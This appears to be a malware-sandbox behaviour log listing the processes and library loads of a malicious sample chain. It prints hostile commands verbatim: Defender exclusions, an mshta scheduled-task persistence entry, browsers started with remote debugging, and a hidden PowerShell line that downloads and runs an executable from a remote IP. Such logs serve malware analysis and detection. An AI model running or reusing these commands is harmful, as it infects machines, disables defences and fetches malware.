                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeProcess created: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe "C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe"Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2152,i,11031812561136754540,12085514892588274456,262144 /prefetch:8Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2152,i,11031812561136754540,12085514892588274456,262144 /prefetch:8Jump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Documents\HJEHIJEBKE.exe "C:\Users\user\Documents\HJEHIJEBKE.exe" Jump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe" Jump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2148,i,10048407555887453736,9436864136807657335,262144 /prefetch:3Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2008,i,2217384488025341277,266429373537081613,262144 /prefetch:3
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe "C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe "C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe "C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C0C9.tmp\C0CA.tmp\C0CB.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C1B3.tmp\C1B4.tmp\C1B5.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\HJEHIJEBKE.exe "C:\Users\user\Documents\HJEHIJEBKE.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx'
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\wOXcVegx\jyidkjkfhjawd.exe "C:\wOXcVegx\jyidkjkfhjawd.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeProcess created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F7C7.tmp\F7C8.tmp\F7C9.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\18EB.tmp\18EC.tmp\18ED.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\1B0E.tmp\1B0F.tmp\1B10.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: webio.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: rstrtmgr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: mozglue.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: wsock32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: msvcp140.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: mstask.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: dui70.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: duser.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: chartv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: oleacc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: atlthunk.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeSection loaded: coremessaging.dllJump to behavior
